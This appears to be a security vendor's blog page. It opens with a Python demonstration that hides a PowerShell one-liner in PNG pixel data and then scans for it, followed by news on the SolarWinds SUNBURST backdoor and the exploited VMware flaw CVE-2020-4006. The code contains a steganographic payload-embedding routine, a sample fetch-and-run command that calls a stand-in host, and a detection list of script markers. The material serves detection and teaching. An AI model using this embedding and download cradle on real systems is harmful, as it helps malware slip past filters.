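As an added example, not the campaign’s tooling or any TitanHQ code, the block below shows the technique in miniature: it writes a small PNG, hides a PowerShell one-liner in the low nibbles of the red and green channels, recovers it, and applies the check a sandbox could run on a fetched image. The nibble layout (one payload byte per pixel, after a length prefix), the list of script markers, the gradient standing in for a real photo and the sample one-liner are all assumptions made for illustration; the PNG reader handles only the unfiltered 8-bit RGB images this example writes.

```python
"""Added example (not the campaign's tooling or TitanHQ code): hide a script in
the low nibbles of a PNG's pixel values, recover it, and scan the decoded data.
The nibble layout is an assumption chosen for illustration."""
import struct
import zlib

PNG_SIG = b"\x89PNG\r\n\x1a\n"


def _chunk(tag: bytes, body: bytes) -> bytes:
    crc = zlib.crc32(tag + body) & 0xFFFFFFFF
    return struct.pack(">I", len(body)) + tag + body + struct.pack(">I", crc)


def write_png(width: int, height: int, rgb: bytes) -> bytes:
    """Minimal 8-bit RGB PNG writer; every scanline uses filter type 0 (None)."""
    if len(rgb) != width * height * 3:
        raise ValueError("rgb buffer does not match dimensions")
    rows = b"".join(b"\x00" + rgb[y * width * 3:(y + 1) * width * 3] for y in range(height))
    ihdr = struct.pack(">IIBBBBB", width, height, 8, 2, 0, 0, 0)  # bit depth 8, colour type 2 = RGB
    return PNG_SIG + _chunk(b"IHDR", ihdr) + _chunk(b"IDAT", zlib.compress(rows)) + _chunk(b"IEND", b"")


def read_png(data: bytes):
    """Return (width, height, rgb) for 8-bit RGB PNGs with unfiltered rows, i.e.
    what write_png produces. Scanning arbitrary PNGs also needs filter types 1-4
    and other colour types; use an image library such as Pillow for that."""
    if data[:8] != PNG_SIG:
        raise ValueError("not a PNG")
    pos, idat, width, height = 8, b"", 0, 0
    while pos + 8 <= len(data):
        length, tag = struct.unpack(">I4s", data[pos:pos + 8])
        body = data[pos + 8:pos + 8 + length]
        if tag == b"IHDR":
            width, height, depth, ctype = struct.unpack(">IIBB", body[:10])
            if depth != 8 or ctype != 2:
                raise ValueError("only 8-bit RGB is supported here")
        elif tag == b"IDAT":
            idat += body                      # pixel data may span several IDAT chunks
        elif tag == b"IEND":
            break
        pos += 12 + length                    # length + tag + body + crc
    raw = zlib.decompress(idat)
    stride = width * 3 + 1                    # one filter byte precedes each row
    rows = []
    for y in range(height):
        if raw[y * stride] != 0:
            raise ValueError("filtered scanline; unfilter before extracting")
        rows.append(raw[y * stride + 1:(y + 1) * stride])
    return width, height, b"".join(rows)


def embed(cover_rgb: bytes, payload: bytes) -> bytes:
    """One payload byte per pixel: high nibble into the low 4 bits of R, low
    nibble into the low 4 bits of G, after a 4-byte length prefix. Each channel
    changes by at most 15/255, so the picture looks unchanged."""
    data = struct.pack(">I", len(payload)) + payload
    if len(data) * 3 > len(cover_rgb):
        raise ValueError("cover image too small for payload")
    out = bytearray(cover_rgb)
    for i, b in enumerate(data):
        out[3 * i] = (out[3 * i] & 0xF0) | (b >> 4)
        out[3 * i + 1] = (out[3 * i + 1] & 0xF0) | (b & 0x0F)
    return bytes(out)


def extract(stego_rgb: bytes) -> bytes:
    """Inverse of embed; raises ValueError when the length prefix is implausible."""
    def byte_at(i):
        return ((stego_rgb[3 * i] & 0x0F) << 4) | (stego_rgb[3 * i + 1] & 0x0F)
    length = struct.unpack(">I", bytes(byte_at(i) for i in range(4)))[0]
    if 4 + length > len(stego_rgb) // 3:
        raise ValueError("no embedded payload")
    return bytes(byte_at(i) for i in range(4, 4 + length))


# Markers a sandbox might look for in whatever the image *decodes* to (assumed list).
SUSPICIOUS = (b"Invoke-Expression", b"IEX", b"FromBase64String", b"DownloadString", b"-EncodedCommand")


def scan_png(png: bytes) -> list:
    """A file-level AV signature sees only compressed pixel data; the sandbox has
    to apply the same decoding the malware would and scan the result."""
    _, _, rgb = read_png(png)
    try:
        hidden = extract(rgb)
    except (ValueError, IndexError):
        return []
    return [m.decode() for m in SUSPICIOUS if m in hidden]


def make_cover(width: int, height: int) -> bytes:
    """Constructed gradient standing in for a real photo."""
    return bytes((x * 5 + y * 3 + c * 60) & 0xFF for y in range(height) for x in range(width) for c in range(3))


if __name__ == "__main__":
    script = b"IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/stage2.ps1')"
    png = write_png(32, 32, embed(make_cover(32, 32), script))
    print(scan_png(png))      # ['IEX', 'DownloadString']
    print(script in png)      # False: the script never appears as a byte string in the file
```

The last line is the detection lesson: the one-liner is split into nibbles and then deflate-compressed, so neither a string match nor a hash on the downloaded file finds it. Only a scanner that reproduces the extraction step, or that flags any script which decodes data out of an image in the first place, sees the payload.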
This campaign was discovered by the security researcher ArkBird, who compared it to one conducted by an APT group known as MuddyWater, which emerged around 2017. The threat group, also known as Static Kitten, Seedworm, and Mercury, primarily attacks Middle Eastern countries, commonly Saudi Arabia and Iraq, although it has also been known to attack European and US targets. It is not known whether this group is behind the campaign.
Of course, one of the most effective ways to prevent these attacks is to stop the malicious email from being delivered to inboxes. A spam filter such as SpamTitan that incorporates a sandbox for safely analysing attachments will help ensure these messages never reach inboxes. End user training is also recommended so that employees know never to enable macros in Word documents sent by email.
A web filtering solution is also effective. Web filters such as WebTitan can be configured to give IT teams full control over the web content employees can access. Since GitHub is commonly used by IT staff and other workers for legitimate purposes, an organization-wide block on the site is not wise. Instead, a selective block can be applied to groups of employees or departments that prevents GitHub and other potentially risky code sharing sites such as Pastebin from being accessed, deliberately or unintentionally, to provide an extra layer of security.
The Cybersecurity and Infrastructure Security Agency (CISA) has released an official alert warning that sophisticated threat actors are actively exploiting SolarWinds Orion IT monitoring and management software.
The attack is believed to be the work of a highly sophisticated, evasive, nation-state hacking group that created a Trojanized version of the Orion software, which has been used to deploy a backdoor, named SUNBURST, into customers’ systems.
The supply chain attack has affected approximately 18,000 customers, who are believed to have installed the Trojanized version of SolarWinds Orion and with it the SUNBURST backdoor. SolarWinds Orion is used by large public and private organizations and government bodies.
SolarWinds’ customers include all five branches of the U.S. military, the Pentagon, the State Department, NASA and the National Security Agency. Its products are also used by 425 of the 500 largest publicly traded U.S. firms. The US Treasury, the US National Telecommunications and Information Administration (NTIA), and the Department of Homeland Security are known to have been targeted. The campaign was first discovered by the cybersecurity company FireEye, which was itself compromised in the same campaign.
The attacks began in spring 2020, when the first malicious versions of the Orion software were released, and the attackers are thought to have been active in compromised networks since then. The malware is evasive, which is why the threat took so long to discover. FireEye commented: “The malware masquerades its network traffic as the Orion Improvement Program (OIP) protocol and stores reconnaissance results within legitimate plugin configuration files allowing it to blend in with legitimate SolarWinds activity”. Once the backdoor is in place, the attackers move laterally and steal data.
Kevin Thompson, SolarWinds President and CEO said: “We believe that this vulnerability is the result of a highly-sophisticated, targeted, and manual supply chain attack by a nation-state”.
The attackers gained access to SolarWinds’ software development environment and inserted the backdoor code into a library shipped with SolarWinds Orion Platform software versions 2019.4 HF 5 through 2020.2.1 HF 1, which were released between March 2020 and June 2020.
CISA issued an Emergency Directive ordering all federal civilian agencies to take immediate action to block any attack in progress by disconnecting or powering down SolarWinds Orion products, versions 2019.4 through 2020.2.1 HF1. The agencies have also been forbidden from “(re)joining the Windows host OS to the enterprise domain.”
All users have been told to upgrade their SolarWinds Orion software to Orion Platform version 2020.2.1 HF 1 immediately. A further hotfix, 2020.2.1 HF 2, is due to be released on Tuesday and will replace the compromised component and add further security measures.
If an immediate upgrade is not possible, SolarWinds has published guidance on securing the Orion Platform. Organizations should also scan for indicators of compromise. Signatures for the backdoor are being added to antivirus engines, and Microsoft has confirmed that all of its antivirus products now detect the backdoor; users have been advised to run a full scan.
SolarWinds is working with FireEye, the Federal Bureau of Investigation, and the intelligence community to investigate the attack. SolarWinds is also working with Microsoft to remove an attack vector that leads to the compromise of targets’ Microsoft Office 365 productivity tools.
It is not yet known which group is behind the attack, although the Washington Post claims to have spoken to sources who confirmed the attack was the work of the Russian nation-state hacking group APT29 (Cozy Bear). A Kremlin spokesperson said Russia had nothing to do with the attacks, stating: “Russia does not conduct offensive operations in the cyber domain.”
The U.S. National Security Agency (NSA) has released a cybersecurity advisory warning that Russian state-sponsored hackers are exploiting a flaw in VMware virtual workspace products used to support remote working.
The flaw, tracked as CVE-2020-4006, is present in certain versions of the VMware Workspace One Access, Access Connector, Identity Manager, and Identity Manager Connector products and is being exploited to gain access to enterprise networks and protected data on the affected systems.
The vulnerability is a command injection flaw in the administrative configurator component of the affected products. It can be exploited remotely by an attacker with valid credentials and network access to the administrative configurator on port 8443. Successful exploitation allows the attacker to execute commands with unrestricted privileges on the underlying operating system and access sensitive data.
VMware released a patch for the vulnerability on December 3, 2020 and also published guidance to help network defenders identify systems that have already been compromised, along with steps to evict threat actors who have already exploited the vulnerability.
The flaw may not have been given high priority by system administrators, as VMware rated it only ‘important’ severity, with a CVSS v3 base score of 7.2 out of 10. The relatively low rating reflects the fact that a valid password must be supplied to exploit the flaw and that the account is internal to the affected range of products. However, as the NSA pointed out, the Russian threat actors are already exploiting the flaw using stolen credentials.
In attacks analysed by the NSA, the attackers exploited the command injection flaw to install a web shell, then generated SAML authentication assertions and sent them to Microsoft Active Directory Federation Services (ADFS), which granted them access to protected data.
The best way to prevent exploitation is to apply the VMware patch as soon as possible. If that is not possible, it is important to ensure that strong, unique passwords are set to protect against brute force attempts to recover them. The NSA also advises administrators to ensure the web-based management interface is not accessible from the Internet.
Strong passwords will not prevent exploitation once an attacker has obtained valid credentials, and they provide no protection if the flaw has already been exploited. The NSA said: “It is critical when running products that perform authentication that the server and all the services that depend on it are properly configured for secure operation and integration. Otherwise, SAML assertions could be forged, granting access to numerous resources.”
When integrating authentication servers with ADFS, the NSA recommends following Microsoft’s best practices, especially for securing SAML assertions. Multi-factor authentication should also be configured.
The NSA has published a workaround that can be used to prevent exploitation until the patch can be applied, and recommends reviewing and hardening configurations and monitoring federated authentication providers.
Unfortunately, detecting exploitation of the flaw can be difficult. The NSA explained in the advisory that “network-based indicators are unlikely to be effective at detecting exploitation since the activity occurs exclusively inside an encrypted transport layer security (TLS) tunnel associated with the web interface.”
VMware advises all customers to refer to VMSA-2020-0027 for information on this flaw.